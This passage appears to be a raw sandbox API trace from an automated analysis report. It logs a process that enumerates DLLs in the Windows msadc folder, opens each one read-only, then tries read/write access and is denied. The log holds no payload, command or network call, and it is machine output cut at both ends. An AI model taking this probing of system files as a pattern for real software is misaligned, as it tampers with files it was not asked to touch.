lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.553] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.553] CloseHandle (hObject=0x348) returned 1 [0088.554] AreFileApisANSI () returned 1 [0088.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75b70 [0088.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 55 [0088.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.554] GetLastError () returned 0x5 [0088.554] GetLastError () returned 0x5 [0088.554] SetLastError (dwErrCode=0x5) [0088.554] GetLastError () returned 0x5 [0088.554] SetLastError (dwErrCode=0x5) [0088.554] GetLastError () returned 0x5 [0088.554] SetLastError (dwErrCode=0x5) [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0088.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.554] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3b400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadco.dll", cAlternateFileName="")) returned 1 [0088.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0088.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0088.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.555] AreFileApisANSI () returned 1 [0088.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll", lpUsedDefaultChar=0x0) returned 54 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.555] AreFileApisANSI () returned 1 [0088.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75be8 [0088.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 54 [0088.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.556] GetFileType (hFile=0x348) returned 0x1 [0088.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.556] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.556] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.556] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.556] CloseHandle (hObject=0x348) returned 1 [0088.557] AreFileApisANSI () returned 1 [0088.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0088.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 54 [0088.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.557] GetLastError () returned 0x5 [0088.557] GetLastError () returned 0x5 [0088.557] SetLastError (dwErrCode=0x5) [0088.557] GetLastError () returned 0x5 [0088.557] SetLastError (dwErrCode=0x5) [0088.557] GetLastError () returned 0x5 [0088.557] SetLastError (dwErrCode=0x5) [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.557] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadcor.dll", cAlternateFileName="")) returned 1 [0088.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0088.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.558] AreFileApisANSI () returned 1 [0088.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll", lpUsedDefaultChar=0x0) returned 55 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0088.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.558] AreFileApisANSI () returned 1 [0088.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0088.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 55 [0088.559] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.676] GetFileType (hFile=0x360) returned 0x1 [0088.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.676] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.676] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.676] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.676] CloseHandle (hObject=0x360) returned 1 [0088.677] AreFileApisANSI () returned 1 [0088.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75eb8 [0088.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 55 [0088.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.677] GetLastError () returned 0x5 [0088.677] GetLastError () returned 0x5 [0088.677] SetLastError (dwErrCode=0x5) [0088.677] GetLastError () returned 0x5 [0088.677] SetLastError (dwErrCode=0x5) [0088.677] GetLastError () returned 0x5 [0088.677] SetLastError (dwErrCode=0x5) [0088.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0088.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.677] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x44400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadds.dll", cAlternateFileName="")) returned 1 [0088.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0088.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.678] AreFileApisANSI () returned 1 [0088.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll", lpUsedDefaultChar=0x0) returned 54 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0088.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.679] AreFileApisANSI () returned 1 [0088.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76200 [0088.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 54 [0088.679] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.679] GetFileType (hFile=0x360) returned 0x1 [0088.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0088.679] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.679] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.679] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.680] CloseHandle (hObject=0x360) returned 1 [0088.680] AreFileApisANSI () returned 1 [0088.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0088.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 54 